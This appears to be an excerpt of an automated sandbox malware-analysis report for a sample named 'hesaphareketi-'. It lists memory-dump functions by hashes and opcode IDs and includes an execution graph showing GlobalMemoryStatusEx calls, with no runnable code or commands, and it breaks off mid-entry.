                                            • Source File: 00000000.00000002.1250486667.000000000A8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A8C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a8c0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: PHq$PHq
                                            • API String ID: 0-1274609152
                                            • Opcode ID: fd2a07cc36780354a9d6ee526bbeef22e4c5410de9bb44c09e67f4b36bb3ac52
                                            • Instruction ID: c76b0fef6565efede95150a74c3bb0fbc87b07eb80a923d9e460eb880644654d
                                            • Opcode Fuzzy Hash: fd2a07cc36780354a9d6ee526bbeef22e4c5410de9bb44c09e67f4b36bb3ac52
                                            • Instruction Fuzzy Hash: 6ED1B234A146048FDB58DF69C598AA9B7F1BF8D301F2681A8E505EB362DB31ED41CF60
                                            Function 00DF6FE0 Relevance: 2.7, Strings: 2, Instructions: 206COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1237746668.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_df0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: \sq$n:c
                                            • API String ID: 0-125588642
                                            • Opcode ID: bb8d1aa94d0537b82b4b059ea8faa9dffcc764d257dcab740683964e81ac1b52
                                            • Instruction ID: 222bdc001faf5ab6faeaf52def0da0949184c884c4e1c3718f7d7100d9aa967e
                                            • Opcode Fuzzy Hash: bb8d1aa94d0537b82b4b059ea8faa9dffcc764d257dcab740683964e81ac1b52
                                            • Instruction Fuzzy Hash: 6471E778D4020E9FDF14CFA9D884AFEBBB1FF48300F21A655D412EB254DB35A9458B64
                                            Function 05732528 Relevance: .3, Instructions: 315COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1241727374.0000000005730000.00000040.00000800.00020000.00000000.sdmp, Offset: 05730000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5730000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3afccb371bf166a05b80130bfac632dc947261f63af6960f45ccf2bc1718b1ca
                                            • Instruction ID: 50c9862af7969de9437264b6fe731519c8682fa6048e4af0a5936a5dca67a0ac
                                            • Opcode Fuzzy Hash: 3afccb371bf166a05b80130bfac632dc947261f63af6960f45ccf2bc1718b1ca
                                            • Instruction Fuzzy Hash: 861294F1CD17458AE310CF25F94C2893BA5BB41318FD04A19DA612F2E5EBB4166EEF48
                                            Function 07579790 Relevance: .3, Instructions: 312COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1247823702.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7570000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bfa573c4fe0f6289086dea1afdc0e4e6067887e34d69706307c0d1ee1bfbe0f8
                                            • Instruction ID: 2196d07b1069bf9c38f27f24b152de43dc0b2f414e413dbeab896ffd301df21b
                                            • Opcode Fuzzy Hash: bfa573c4fe0f6289086dea1afdc0e4e6067887e34d69706307c0d1ee1bfbe0f8
                                            • Instruction Fuzzy Hash: D1E106B4E002198FDB14DFA9D580AAEBBF6FF89304F248169E455AB355D730AD42CF60
                                            Function 0757B480 Relevance: .3, Instructions: 312COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1247823702.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7570000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ef71cdbe3c438903c29dae8495d7a53d86ddbe9c8ca04ea6110bf0da58093e50
                                            • Instruction ID: 6fe56dbd9078cfd1aaf23ca42faa4c13cc4537d3c10a90b3d7ec64a047cbd8bd
                                            • Opcode Fuzzy Hash: ef71cdbe3c438903c29dae8495d7a53d86ddbe9c8ca04ea6110bf0da58093e50
                                            • Instruction Fuzzy Hash: 5FE1E6B4E002598FDB14DFA9D580AAEFBF2BF89304F248169E455AB355D730AD42CF60
                                            Function 07579358 Relevance: .3, Instructions: 312COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1247823702.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7570000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4961ac58ad453b207158e13109d2efaf4be3e2668923e6adc37b25b1958e209d
                                            • Instruction ID: 60a69ee68fee883575cb658b816dde59b3edd50377b38e5ed44c16abb7d6dc1f
                                            • Opcode Fuzzy Hash: 4961ac58ad453b207158e13109d2efaf4be3e2668923e6adc37b25b1958e209d
                                            • Instruction Fuzzy Hash: ECE1F9B4E002598FDB14DFA9D580AAEFBF2BF89304F248169E455AB355D730AD42CF60
                                            Function 0757AF70 Relevance: .3, Instructions: 312COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1247823702.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7570000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a0e6bf2e6fdcedae1ea7d1d17a9ef833889b085c192940ab7a61a9bf25c932d7
                                            • Instruction ID: d1123e137dafe6b35dd9c33f16921d7ceb03d3baba635bc6eee1470a6b1899f3
                                            • Opcode Fuzzy Hash: a0e6bf2e6fdcedae1ea7d1d17a9ef833889b085c192940ab7a61a9bf25c932d7
                                            • Instruction Fuzzy Hash: 61E118B4E002598FDB14DFA9D580AAEFBF2BF89300F248169E455AB355D731AD42CF60
                                            Function 07578F20 Relevance: .3, Instructions: 312COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1247823702.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7570000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2f452974f77b651ddbd1bbc59bc14bba978b206a8b0502d58f9befa58dd2ba5d
                                            • Instruction ID: d963acf74b94959950c727bf88ba33c5a08e1475f50c05bd2087731c2938f066
                                            • Opcode Fuzzy Hash: 2f452974f77b651ddbd1bbc59bc14bba978b206a8b0502d58f9befa58dd2ba5d
                                            • Instruction Fuzzy Hash: 2DE1E8B4E002198FDB14DFA9D580AAEFBF2BF89304F248169E455AB355D731AD42CF60
                                            Function 07571617 Relevance: .3, Instructions: 272COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1247823702.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7570000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 80219b861f6e9e435eb15c539bfd1eca81ac39f733b68cecf18e45876b4ee5ca
                                            • Instruction ID: 918c3b223aac52cbf9deaeefe5eeb2e02b919452eae8471b73ddf4770c2adaab
                                            • Opcode Fuzzy Hash: 80219b861f6e9e435eb15c539bfd1eca81ac39f733b68cecf18e45876b4ee5ca
                                            • Instruction Fuzzy Hash: 9AD1F535D2075ACACB11EF64D895A99F771EF95300F20C79AE0493B224EB706AC9CB91
                                            Function 07571628 Relevance: .3, Instructions: 264COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1247823702.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7570000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2894fc2df49712babd61888a1ec8529ce3442f2839451d9dfd95d8d70708ecaa
                                            • Instruction ID: aa036b68899b3e84001b84c25329bcbb20eb688ee63f0e60f8ec4e491f10f504
                                            • Opcode Fuzzy Hash: 2894fc2df49712babd61888a1ec8529ce3442f2839451d9dfd95d8d70708ecaa
                                            • Instruction Fuzzy Hash: 18D1F435D2075ACACB11EF64D895A99F771EF95300F20C79AE0493B224EB706AC9CF91
                                            Function 0573058C Relevance: .3, Instructions: 264COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1241727374.0000000005730000.00000040.00000800.00020000.00000000.sdmp, Offset: 05730000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5730000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ac5e4b5707721a465ff5711eccdeef715d78408c57ac0f2a83912d2ea009c434
                                            • Instruction ID: 2a2c0d6c879f0b695df5860fe0e9365145735f8d009d247e926f73b84cea9984
                                            • Opcode Fuzzy Hash: ac5e4b5707721a465ff5711eccdeef715d78408c57ac0f2a83912d2ea009c434
                                            • Instruction Fuzzy Hash: 21A17F32E00219CFCF05DFB5D8489AEB7B2FF85310B55456AE806AB266DB31E916DB40
                                            Function 05732518 Relevance: .2, Instructions: 220COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1241727374.0000000005730000.00000040.00000800.00020000.00000000.sdmp, Offset: 05730000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5730000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fcd46c87761f8938535b4f90d34495e4592eb3fa84fab97f2efd93b611475a35
                                            • Instruction ID: 793fcdbff6bce194e0b1934aa56b794110407aafda7a2d38b748af1f06c7f5c3
                                            • Opcode Fuzzy Hash: fcd46c87761f8938535b4f90d34495e4592eb3fa84fab97f2efd93b611475a35
                                            • Instruction Fuzzy Hash: 79C107B1CD07458BE710CF25F84C2893BB5BB85324F904A19D9612F2E1EBB4166EEF48
                                            Function 07579348 Relevance: .1, Instructions: 147COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1247823702.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7570000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 974186d0912bd9802ab699ad3cfb9cd13a9377713c6f6f459c7a3193bca1080b
                                            • Instruction ID: 1e407eb6643ac3d2202b98e0f4bfe50bf969b07fbcc26be464783f82d5138f7e
                                            • Opcode Fuzzy Hash: 974186d0912bd9802ab699ad3cfb9cd13a9377713c6f6f459c7a3193bca1080b
                                            • Instruction Fuzzy Hash: 93514BB4E042198FDB14DFA9D5819EEFBF2BF89200F24816AD418AB355D731AD41CFA1
                                            Function 0757B470 Relevance: .1, Instructions: 145COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1247823702.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7570000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3fac687b490fe8ce5de947059db82c6bd82017c5d44b23d6827c42c268540cb2
                                            • Instruction ID: 69fce7aa67bf4ba464e16cffee36f57277512d3eec1145988a177ee5c3b756d9
                                            • Opcode Fuzzy Hash: 3fac687b490fe8ce5de947059db82c6bd82017c5d44b23d6827c42c268540cb2
                                            • Instruction Fuzzy Hash: 015108B0E002198FDB14DFA9D5809EEBBF6BF89300F24816AD558AB355D7319942CFA1
                                            Function 0757AF60 Relevance: .1, Instructions: 137COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1247823702.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7570000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 845be520c4658965eeef12d0c5a5ac8fc848b76c375d9a27c800de451a2f27e8
                                            • Instruction ID: e83cb1ddc0780ca30bd76a1546e3a309229f6f647a842f5c1e5173c91b49cd4c
                                            • Opcode Fuzzy Hash: 845be520c4658965eeef12d0c5a5ac8fc848b76c375d9a27c800de451a2f27e8
                                            • Instruction Fuzzy Hash: DF5129B4E042198FDB14DFA9D5809AEFBF2BF89300F24816AD418AB355D7319942CFA1
                                            Function 00DF780B Relevance: .1, Instructions: 123COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1237746668.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_df0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fc6c4c84f14bc55ee63101417ef9cd0cc517d0c2888e933f8cd7d4661364bba7
                                            • Instruction ID: deb801fc40f70badd6777fac57cf87c09621a6bec294b72d95c9635367aae81b
                                            • Opcode Fuzzy Hash: fc6c4c84f14bc55ee63101417ef9cd0cc517d0c2888e933f8cd7d4661364bba7
                                            • Instruction Fuzzy Hash: 0C412F78E6400E9FDF10CFE9E8819EDB7F1BF88305B15E216E016EB241CA31A8418B50
                                            Function 05775140 Relevance: 7.6, Strings: 6, Instructions: 118COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$4'q$4'q$4'q$4'q$4'q
                                            • API String ID: 0-1794337482
                                            • Opcode ID: bf9cf78f448e5f6b26e4084c4ea932a4ae224cd2a0fa9186949901ef6146bcba
                                            • Instruction ID: 4720b85868feac7aea446458c40c4707b2cdb8581dd027a5edaf835fae283d86
                                            • Opcode Fuzzy Hash: bf9cf78f448e5f6b26e4084c4ea932a4ae224cd2a0fa9186949901ef6146bcba
                                            • Instruction Fuzzy Hash: F6412FB4E912068FCB48EF74F85559E77B2FB84300B80496AD405DF265FB30691EEB85
                                            Function 05775150 Relevance: 7.6, Strings: 6, Instructions: 95COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$4'q$4'q$4'q$4'q$4'q
                                            • API String ID: 0-1794337482
                                            • Opcode ID: 33d60c43a1fe9f80de225cb3ef3ca289ed6e620cbe9750316fe3c53f2492b476
                                            • Instruction ID: 78aa049e07f5c0831b02d35a8295bed2f89ce9d09f7b78a400c2105a6c6adae3
                                            • Opcode Fuzzy Hash: 33d60c43a1fe9f80de225cb3ef3ca289ed6e620cbe9750316fe3c53f2492b476
                                            • Instruction Fuzzy Hash: 2C410CB4E8120A8FC748EF75F4559AE77B2FB84300BD0896AC4059F265FB30691DEB85

                                            Execution Graph

                                            Execution Coverage:8%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:0%
                                            Total number of Nodes:24
                                            Total number of Limit Nodes:5
                                            execution_graph 50598 cf0848 50600 cf084e 50598->50600 50599 cf091b 50600->50599 50603 cf133f 50600->50603 50609 cf1450 50600->50609 50605 cf12e7 50603->50605 50606 cf1343 50603->50606 50604 cf1448 50604->50600 50605->50600 50606->50604 50608 cf1450 GlobalMemoryStatusEx 50606->50608 50614 cf7059 50606->50614 50608->50606 50610 cf1356 50609->50610 50611 cf1448 50610->50611 50612 cf1450 GlobalMemoryStatusEx 50610->50612 50613 cf7059 GlobalMemoryStatusEx 50610->50613 50611->50600 50612->50610 50613->50610 50615 cf7063 50614->50615 50616 cf7119 50615->50616 50619 5edd2c8 50615->50619 50623 5edd2d8 50615->50623 50616->50606 50620 5edd2d8 50619->50620 50621 5edd502 50620->50621 50622 5edd51a GlobalMemoryStatusEx 50620->50622 50621->50616 50622->50620 50624 5edd2ed 50623->50624 50625 5edd502 50624->50625 50626 5edd51a GlobalMemoryStatusEx 50624->50626 50625->50616 50626->50624

                                            Executed Functions

                                            Function 00CF9BB0 Relevance: 2.9, Instructions: 2856COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3682796093.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_cf0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f9fb97aadc26f97b55d30b15e86bedf41d1d99a8a786a9f8c2abece138a1e2fa
                                            • Instruction ID: 9bfd72c8d9cea707e98d590041a91cc5b514b068aece584f589dd76c9ba05a99
                                            • Opcode Fuzzy Hash: f9fb97aadc26f97b55d30b15e86bedf41d1d99a8a786a9f8c2abece138a1e2fa
                                            • Instruction Fuzzy Hash: 2D63F631D10B1A8ADB51EF68C8846A9F7B1FF99300F15D79AE45877121EB70AAC4CF81
                                            Function 00CFCF20 Relevance: 2.3, Instructions: 2310COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3682796093.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_cf0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e22ddb1336cead27dda84420504b955c75869397ae2681c633cbc5c96d0e6d5a
                                            • Instruction ID: dfe136559cfbeff4673afbe35002b6142e92f66731e69f6a13f0b4533e989f1a
                                            • Opcode Fuzzy Hash: e22ddb1336cead27dda84420504b955c75869397ae2681c633cbc5c96d0e6d5a
                                            • Instruction Fuzzy Hash: 52331E31D107198EDB11EF68C8806ADF7B1FF99300F15C79AE559A7221EB70AAC5CB81
                                            Function 00CF4A60 Relevance: .3, Instructions: 266COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3682796093.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_cf0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5183cdbaeca488153a0a30516a851fca8a756d3b5be73c3b825ff1d2ab1febaa
                                            • Instruction ID: 2bdf0bcbda095281b1e3fb80f0c6020a876a6defe0b39705df3e5f6426b4677f
                                            • Opcode Fuzzy Hash: 5183cdbaeca488153a0a30516a851fca8a756d3b5be73c3b825ff1d2ab1febaa
                                            • Instruction Fuzzy Hash: 84B15E70E0060D8FDB68CFA9D8857AEBBF2AF88314F148529D515A7294EB749941CB82
                                            Function 00CF3E48 Relevance: .2, Instructions: 238COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3682796093.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_cf0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3e6c6968b30948c36052646ea0c9eabaaa77f21a2d374675e77281c5b0114e0b
                                            • Instruction ID: aa118cb034570e188629d3a11fae7bb0f0ec551ca41a732a5ba1553ecd2bc6ab
                                            • Opcode Fuzzy Hash: 3e6c6968b30948c36052646ea0c9eabaaa77f21a2d374675e77281c5b0114e0b
                                            • Instruction Fuzzy Hash: E4916D70E0034DDFDF64CFA9C8857AEBBF2AF88314F248129E515A7294DB749985CB42
                                            Function 00CF6EA3 Relevance: 2.6, Strings: 2, Instructions: 146COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2242 cf6ea3-cf6f0a call cf6c08 2251 cf6f0c-cf6f25 call cf634c 2242->2251 2252 cf6f26-cf6f55 2242->2252 2256 cf6f57-cf6f5a 2252->2256 2257 cf6f5c-cf6f91 2256->2257 2258 cf6f96-cf6f99 2256->2258 2257->2258 2260 cf6fad-cf6fb0 2258->2260 2261 cf6f9b-cf6fa2 2258->2261 2264 cf6fe3-cf6fe6 2260->2264 2265 cf6fb2-cf6fc6 2260->2265 2262 cf7168-cf716f 2261->2262 2263 cf6fa8 2261->2263 2263->2260 2266 cf6fe8 call cf798b 2264->2266 2267 cf6ff6-cf6ff8 2264->2267 2272 cf6fcc 2265->2272 2273 cf6fc8-cf6fca 2265->2273 2274 cf6fee-cf6ff1 2266->2274 2268 cf6fff-cf7002 2267->2268 2269 cf6ffa 2267->2269 2268->2256 2271 cf7008-cf7017 2268->2271 2269->2268 2277 cf7019-cf701c 2271->2277 2278 cf7041-cf7057 2271->2278 2275 cf6fcf-cf6fde 2272->2275 2273->2275 2274->2267 2275->2264 2281 cf7024-cf703f 2277->2281 2278->2262 2281->2277 2281->2278
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3682796093.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_cf0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LRq$LRq
                                            • API String ID: 0-3710822783
                                            • Opcode ID: 2fa0aed335649f21fb21b9e095b0145f66e90c3ca3c5e0fec8a25ecc15b706f3
                                            • Instruction ID: dcd2a244480dab42efbdacb3e6a6bde60545cca891379f63fb100f4d6cd0674b
                                            • Opcode Fuzzy Hash: 2fa0aed335649f21fb21b9e095b0145f66e90c3ca3c5e0fec8a25ecc15b706f3
                                            • Instruction Fuzzy Hash: 7651E430A042498FDB15DBB9D8107AEBFB2EF86300F10856AE515EB351EB719D46CB52
                                            Function 05EDE0D8 Relevance: 1.6, APIs: 1, Instructions: 135COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2901 5ede0d8-5ede0f3 2902 5ede11d-5ede13c call 5edd2a4 2901->2902 2903 5ede0f5-5ede11c call 5edd298 2901->2903 2909 5ede13e-5ede141 2902->2909 2910 5ede142-5ede1a1 2902->2910 2917 5ede1a7-5ede234 GlobalMemoryStatusEx 2910->2917 2918 5ede1a3-5ede1a6 2910->2918 2922 5ede23d-5ede265 2917->2922 2923 5ede236-5ede23c 2917->2923 2923->2922
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3689431073.0000000005ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05ED0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_5ed0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e83409d9d9788f883212aa7448887fc5abfdf940985a8dbcb0ba9812f92ff053
                                            • Instruction ID: 18b90a0c21216fa3a763d6cdb7d50db174d0469e784353a43566b7fd42c21a31
                                            • Opcode Fuzzy Hash: e83409d9d9788f883212aa7448887fc5abfdf940985a8dbcb0ba9812f92ff053
                                            • Instruction Fuzzy Hash: 54410231E043598FDB14DFA9D80479EFBB5EF89210F14866AD444EB741DB78D846CBA0
                                            Function 05EDE1C0 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2926 5ede1c0-5ede1fe 2927 5ede206-5ede234 GlobalMemoryStatusEx 2926->2927 2928 5ede23d-5ede265 2927->2928 2929 5ede236-5ede23c 2927->2929 2929->2928
                                            APIs
                                            • GlobalMemoryStatusEx.KERNELBASE ref: 05EDE227
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3689431073.0000000005ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05ED0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_5ed0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID: GlobalMemoryStatus
                                            • String ID:
                                            • API String ID: 1890195054-0
                                            • Opcode ID: c6a0249d7de4dcda4df0f7ac2fe4471741cdd118d75e0927c78adfc16cdf4191
                                            • Instruction ID: b6d0e830bd848fca6554839d083bcc072f5e84de7e8168e9669cc71e295ae18f
                                            • Opcode Fuzzy Hash: c6a0249d7de4dcda4df0f7ac2fe4471741cdd118d75e0927c78adfc16cdf4191
                                            • Instruction Fuzzy Hash: 351123B1C0025A9BDB20DF9AD549BDEFBF4FF48324F10812AD918A7640D778A941CFA1
                                            Function 00CFF465 Relevance: 1.4, Strings: 1, Instructions: 112COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3682796093.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_cf0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: PHq
                                            • API String ID: 0-3820536768
                                            • Opcode ID: 1a77ea1287e530536c049a17543467164a345724e48713340007d2fc48488de0
                                            • Instruction ID: d68e50540d9ca7a889416b17b057b83dc2dff8aa645b1fb13403af537b41b04f
                                            • Opcode Fuzzy Hash: 1a77ea1287e530536c049a17543467164a345724e48713340007d2fc48488de0
                                            • Instruction Fuzzy Hash: 4B41D830B002098FDB69AF3989A476E7BA2EF89310B24457DD406DB395DE34DD03CB82
                                            Function 00CF6F40 Relevance: 1.3, Strings: 1, Instructions: 97COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3682796093.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_cf0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LRq
                                            • API String ID: 0-3187445251
                                            • Opcode ID: 1af76aa2aeaa886031cf298c19aef407687c8bd35e5462ff7ae46b24fa77ab3b
                                            • Instruction ID: 595df0c824533c034f22fee723d8e1dd06f6c1fafd138209b65c91ea6a0bcdb3
                                            • Opcode Fuzzy Hash: 1af76aa2aeaa886031cf298c19aef407687c8bd35e5462ff7ae46b24fa77ab3b
                                            • Instruction Fuzzy Hash: F1316F70E1060D8BDB64CFA9D8407AEBBB2FF85350F108526E516EB240EBB5DD86CB51
                                            Function 00CF6B68 Relevance: 1.3, Strings: 1, Instructions: 69COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3682796093.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_cf0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LRq
                                            • API String ID: 0-3187445251
                                            • Opcode ID: 467ffe9e429f71b0dabbe6e7d288602d09a36dd1607fc688afe987360bc7c11d
                                            • Instruction ID: 0f19565b55eb9e457cf0d9e2cbae41d5d7cd83e1ab51ad411cd651b65993269a
                                            • Opcode Fuzzy Hash: 467ffe9e429f71b0dabbe6e7d288602d09a36dd1607fc688afe987360bc7c11d
                                            • Instruction Fuzzy Hash: 4E2132307082805FC725FB7994157AE7BA6FFC5300F1849AEE045CB35AEE758845D7A2
                                            Function 00CF798B Relevance: .6, Instructions: 554COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3682796093.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_cf0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b90a5ad149f884cdc4fdbf850b845cb9a138263bfb67d0c0662610803b5cb922
                                            • Instruction ID: 95402320875e999770fa8077da063422c0dbd7e9e03741e7cf552a45d85e2404
